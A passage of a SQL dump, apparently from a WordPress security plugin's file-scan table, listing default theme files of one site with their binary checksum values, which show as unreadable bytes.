\0pKNrG','',0,'?'),('6tiyxٿ','wp-content/themes/twentysixteen/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/readme.txt',0,'\Z_TxbL','\Z_TxbL','\n@R\r(\ndR}#Eyr','',0,'?'),('BȰ.\07','wp-content/themes/twentysixteen/rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/rtl.css',0,'@c-]<]aXkL','@c-]<]aXkL','F^Fbh2؏MA^frC','',0,'?'),('x,¨N2D˱','wp-content/themes/twentysixteen/screenshot.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\\#J/<W','/d\Zօ[U[`{,2|1W[̚','',0,'?'),('M2έ\"@8','wp-content/themes/twentysixteen/search.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/search.php',0,'en CoĤDM','en CoĤDM','Y?\r**&FjEu絸?','',0,'?'),('FbىQlC','wp-content/themes/twentysixteen/searchform.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۏԛhu%>\0#^','zVr;l?q#RS6OA','',0,'?'),('lޭ','wp-content/themes/twentysixteen/sidebar-content-bottom.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/sidebar-content-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+$VD<:t*A2','\nI{cqZd6Xd2','',0,'?'),('_BaPG;','wp-content/themes/twentysixteen/sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cЎmOWqo(','CoCXRХO`ƻG9\n','',0,'?'),('&Uk','wp-content/themes/twentysixteen/single.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%lc}\Z-V',' ?xv&W=DX*\'\Z','',0,'?'),(':;:-s5\'','wp-content/themes/twentysixteen/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/style.css',0,'X@ö>׾M','X@ö>׾M','jp<ǑWZܩsS-Ü','',0,'?'),('φK ըLH:dg<6','wp-content/themes/twentysixteen/template-parts/biography.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/biography.php',0,'p;{a\n','p;{a\n','ox_4\"yh@KEw,a','',0,'?'),('4Br8Xs)','wp-content/themes/twentysixteen/template-parts/content-none.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-none.php',0,'&<]G$?kqVە','&<]G$?kqVە','}1%npWc%98%\\Gjȷ ','',0,'?'),('CLLJ@','wp-content/themes/twentysixteen/template-parts/content-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-page.php',0,',(R{ABra6',',(R{ABra6','7,hо>#s\"$ܱӳIя','',0,'?'),('sK C\\G/','wp-content/themes/twentysixteen/template-parts/content-search.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-search.php',0,'Z؏\0øݢ9','Z؏\0øݢ9','TVH$L^}`5\rX0g','',0,'?'),('.aZja','wp-content/themes/twentysixteen/template-parts/content-single.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/template-parts/content-single.php',0,'yl熯_ػ','yl熯_ػ','\"-

bG_dEh)pFq7f3!R(YpO','',0,'?'),('^ۛF','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%/`d-^','8}=SZB}.NɳV\Z','',0,'?'),('%!ڡG&5','wp-content/themes/twentytwenty/assets/css/editor-style-block.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-block.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>xƟ%U7:!` @','Yeտ(U~9\Z\r%&bW q\0m','',0,'?'),('ATyxhl|4+n','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}nWr%Ũ^','ӟ]VpŠI*}mo~v','',0,'?'),('(\"?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yb(țSLΝ','sM.[X;a^^,rU','',0,'?'),('f둤s#%','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*x&B!$fW','.7^VtYU@Ď\'~(:>k','',0,'?'),('1^BsCZU*M>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o-6ѥp|','dd^#QҒ\Z#q^ƓJw','',0,'?'),('C4Ȝ-f!-','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n=⎼tNR','@moܛMbrђ$ z\r2K=','',0,'?'),(']ΰm','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2j^!',')秐=l2^m\ruV 20ژM{','',0,'?'),('bHVmA Mh\"','wp-content/themes/twentytwenty/assets/images/2020-square-1.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܴ6Tkx','Lw%7Mȴ x >?\\','',0,'?'),('I:.X?oe z','',0,'?'),('*lKqWM\0| Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-a.t]Uv ','n\0Ʀ+ǶV*C','',0,'?'),('iru5','wp-content/themes/twentytwenty/assets/js/index.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U Ǐ,T8w6N$','̡*:XAʚT@R\"W-\0^D','',0,'?'),('@!aie\\1}ݱz','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3s{ _ƕ]p','o;~]b^RT,]~(\\l\0f\rZ','',0,'?'),('\nn=^nN','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"#1a`','&OUQ}}l&̦l–z','',0,'?'),('ojdyf_b&xNK','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tѡ~°F5 ','@L}*XH3i*tykE|','',0,'?'),('>i>C.|#q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7C\ZQl(','{|y5yh~[rc','',0,'?'),('!+UU\n&','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N!M |X',' DeUFR7pO_7) ud\nsbh5','',0,'?'),('KK1l!D','wp-content/themes/twentytwenty/comments.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a\\{@52\'\'q]s','VAZ&BHPWe?a06d&','',0,'?'),('VϺz#m)','wp-content/themes/twentytwenty/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l{\\)Yкb','\Zqv7 `nʤ)#2&SZ\ra','',0,'?'),('gFBZÚ(v','wp-content/themes/twentytwenty/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6f򞰬ys,5','#b@Z1M/yfA/b','',0,'?'),('$e&gqim','wp-content/themes/twentytwenty/header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0O@2<\rr','dyETI `e(ު)ŔhY˥R','',0,'?'),('K,[!Be&z','',0,'?'),('K47\'Rh?','wp-content/themes/twentytwenty/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XVU\rO8Ͽ','\rR12bc\",5\ZEf {\\R','',0,'?'),('$V|hhy','wp-content/themes/twentytwenty/screenshot.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a#C4Y','TZe gҫR!Mx0^l\r','',0,'?'),('9kɽ JZ<','wp-content/themes/twentytwenty/searchform.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.{0fo\'9K:','X7>b*VsdNJuZ','',0,'?'),('%fGPѣ','wp-content/themes/twentytwenty/singular.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[L˓ۃ$','4\0ީXGnw\0#َ4܆S]TrnUF0\\','',0,'?'),('&~sXm','wp-content/themes/twentytwenty/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WQwvs+r1eş','Hh(_+8pkVc+.טw','',0,'?'),('e~Ь9','wp-content/themes/twentytwenty/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O\\TAN$>V','2@\'\\wӗ̎Ui','',0,'?'),('@4@:','wp-content/themes/twentytwenty/template-parts/content-cover.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IS$}o','Lϰ68(&rR\rIKq<','',0,'?'),('ڨtc ˵:G','wp-content/themes/twentytwenty/template-parts/content.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OϿ]a08q','uoב]jݯ|lޟW','',0,'?'),('j_mEQ,k','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?ۻx趕;R','6vw f+ow3KvP','',0,'?'),('\'(jli ','wp-content/themes/twentytwenty/template-parts/entry-header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O`!8-^\ZnW','m]|\r,:kK9 \";','',0,'?'),('iqxjpR','wp-content/themes/twentytwenty/template-parts/featured-image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e&9G1','`\n]n5.-iw!j5<','',0,'?'),('$lvEC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eԒd&ޡp','-}r/߫,{78+nW[&l','',0,'?'),('}HJ1%`','wp-content/themes/twentytwenty/template-parts/modal-menu.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/modal-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','73-R`1','b CӖ`bʅڝ_0D','',0,'?'),('dD+P','wp-content/themes/twentytwenty/template-parts/modal-search.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jl%1s','l?\rD(y\n+Nͧ\nQ*>L|Yl','',0,'?'),('H\03ۡEp$$','wp-content/themes/twentytwenty/template-parts/navigation.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','63~jw;','3Rx}|%DSPɊ4-|~','',0,'?'),('JuHp','wp-content/themes/twentytwenty/template-parts/pagination.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}3%a\\l[','s-8#c<\0/n\\8ߔ\rPm','',0,'?'),('nO. }','wp-content/themes/twentytwenty/templates/template-cover.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ ,Rh4','C{3N7}gwnSI=5W/','',0,'?'),('Qwat%F%2','wp-content/themes/twentytwenty/templates/template-full-width.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O-CU',' _0g WX\Z\0S ','',0,'?'),('hܼ!\Zo','wp-content/themes/twentytwentyfour/assets/css/button-outline.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/css/button-outline.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڱڱ DG]','Z\0ʜ{\Z:~C\'£wbHCB','',0,'?'),('k+X>C','wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5}\Z>| q',' 4&5r2t\rhGXp2*\';','',0,'?'),('TL>ǧ0&@3','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--U!^*MUaq','s@T Zx9FfӞS{*)5y<','',0,'?'),('eG벪*jp','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZF%~*q',' dsr 5~ .-Z͜5d','',0,'?'),('\rMDenr','wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߷Ld*+L>','6[\05ZG34=15qSwiqJO','',0,'?'),('A0\'jX','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\\as ','N4|R6)@w7゙bGn','',0,'?'),('OƸ)[u˓u','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z` Z<\0*3','J# LӬB)\r&Akij@8cqn','',0,'?'),('kqK8P\0d.','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T30rhD','O6lXӸ@ϗ檉FKH@','',0,'?'),('1-Q$^','wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','բ \"\\\n','v[-NYQVLVg n8b','',0,'?'),('ǽ\Z\rm%Q1+I1','wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\\u`','x`R#GEd[qȟh\nxs','',0,'?'),('3\0~','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rf4','\'Fv`,\rvG$&i1z}\'d','',0,'?'),('€CNPJY1a','wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\ZAH\re ','pJ.<6LӝDcP紆0Pn','',0,'?'),('\"vP12','wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\{yI$,','aLa+#쓚cn_܁Y T','',0,'?'),('DrkJN ƨ','wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=0>qkdU','xr ߦڔՏa,n? hu7KI,','',0,'?'),('\07m','wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% &ٟAYj]','*nam!ӣ\"˶f','',0,'?'),('qNu\"`yf|','wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݺ75N\n8u','rʼn{ ^o2g]ghjբgPתYq','',0,'?'),('C)|D/>E','wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','* Q\"KLG','tJt\0uIbD|wō)i ~`5','',0,'?'),('h.s4-ƝY','wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`ބ&`CV\0',')-RI/LAuֽt7,T؀u','',0,'?'),('{b/;wHs','wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\-2ɏV\0=','PGVGD,F?*Fg\nD(H(+','',0,'?'),('knpx•?yD<','wp-content/themes/twentytwentyfour/assets/images/icon-message.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/icon-message.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}-\0Yv','ᙬʢPjO w[5\\C)u','',0,'?'),('on}tf$','wp-content/themes/twentytwentyfour/assets/images/museum.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/museum.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' +r~S豌s^','WR%L}6^E C!','',0,'?'),('޺5N\"~','wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}do3\rt\'','gӍ\n6<}$֨','',0,'?'),('TsL\\q','wp-content/themes/twentytwentyfour/parts/footer.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/footer.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mo^t-9 ','3i&aP{d4J{R','',0,'?'),('BCKwO8I','wp-content/themes/twentytwentyfour/parts/header.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/header.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jps~ r','mo+a;-m`ic&!#l','',0,'?'),('fօ#ZE','',0,'?'),('3ڬЌ\"','wp-content/themes/twentytwentyfour/parts/sidebar.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/parts/sidebar.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\Zs/,+ƟV','\r j \ni\0NvbOȪ','',0,'?'),('^%iA`Rs','wp-content/themes/twentytwentyfour/patterns/banner-hero.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/banner-hero.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Aj[','f@Anz<HP&x\\ ]','',0,'?'),('{Oqdͮxd','wp-content/themes/twentytwentyfour/patterns/banner-project-description.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/banner-project-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+^qQxn\r5','( \n)0My2qԤvޠ)p','',0,'?'),('I>7Źg','wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=-(C:(R@(','b6','',0,'?'),('7d$Эh','wp-content/themes/twentytwentyfour/patterns/cta-pricing.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W^xOWo','Ph>µ2KAuu\Z-1]','',0,'?'),('!;:L\Z#','wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';_[/Iwam','\n83@ X=!NB>','',0,'?'),('P% ݢI`|','wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¸pWf\0','8O\rpFsT(c]','',0,'?'),('kQd{EJ','wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Zg:)z','kݸ2 چ.db j','',0,'?'),('ɲt85TM\'l','wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cO5 ;ܐW','|7 _OJ\n899桇cQ=Od','',0,'?'),('>u00OIn','wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@NPC-QRK','joꦴ宸)KTR','',0,'?'),('RPlUj+\"gx','wp-content/themes/twentytwentyfour/patterns/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':INwpZN','l_OP3\"vE#QPKMFU K','',0,'?'),('1 r^','wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WIsQ)Hf',',[St\0r?hn*k','',0,'?'),('2} C\ZǏ','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܩjQƳ','XY 90C4HN:$=ʭ*0','',0,'?'),('+A#)՝xnH|7Ⱥ','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ĻNT8T2','Җ|ZFsMŢf_D','',0,'?'),('G nOm','wp-content/themes/twentytwentyfour/patterns/page-home-business.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-business.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FfrOfjI','!]V}X1?wP:','',0,'?'),('gڭ*]I','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rH\Zg?\ndr?3#','wO[iF?ޖHJ@','',0,'?'),('!N`R{}9','wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_T)OErZ','4:+;k\"+3Pp>7','',0,'?'),('o}1=(E&RD_','wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t3)\nX_@','VM#U7$\nqym^;;7','',0,'?'),('*Gct}`n','wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']l6=Kd\Z;','0TT&; 